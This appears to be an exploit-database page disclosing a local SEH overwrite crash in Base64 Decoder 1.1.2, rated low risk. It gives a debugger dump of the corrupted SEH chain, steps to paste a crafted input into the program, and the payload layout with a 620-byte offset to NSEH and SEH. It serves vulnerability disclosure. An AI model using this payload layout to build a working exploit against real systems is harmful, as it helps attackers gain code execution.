Base64 Decoder 1.1.2 - SEH OverWrite PoC

2015.12.22
Credit: Un_N0n
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

******************************************************************************************** # Exploit: b64dec SEH OverWrite. # Date: 12/18/2015 # Exploit Author: Un_N0n # Vendor: Tim Rohlfs # Software Link: http://4mhz.de/b64dec.html # Version: 1.1.2 # Tested on: Windows 7 x64(64bit) ******************************************************************************************** [Dump] SEH chain of thread 00000EC0 Address SE handler 024CFC50 b64dec.00458140 024CFC5C b64dec.004581B3 024CFF28 b64dec.0045847C 024CFF00 41414141 <------- 41414141 *** CORRUPT ENTRY *** <------- ---------------------------------------------------- 024CFEE4 41414141 AAAA 024CFEE8 41414141 AAAA 024CFEEC 41414141 AAAA 024CFEF0 41414141 AAAA 024CFEF4 41414141 AAAA 024CFEF8 41414141 AAAA 024CFEFC 41414141 AAAA 024CFF00 41414141 AAAA Pointer to next SEH record <----- 024CFF04 41414141 AAAA SE handler <----- 024CFF08 41414141 AAAA 024CFF0C 41414141 AAAA 024CFF10 41414141 AAAA 024CFF14 41414141 AAAA 024CFF18 41414141 AAAA [How to?] 1 - Open up b64dec.exe 2 - In Search field, paste in the contents of Crash.txt 3 - Hit 'Decode' ~ Software Crashes due to SEH Over-Write. [Crash.txt?] AAAAAAAAAAAAAAAAAAAAAAAAAA.......620 BBBB CCCC DDDDDDDDDDDDDDDDDDD --------------------------------------|-----| NSEH SEH [Extra Info] Offset = 620 ********************************************************************************************


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top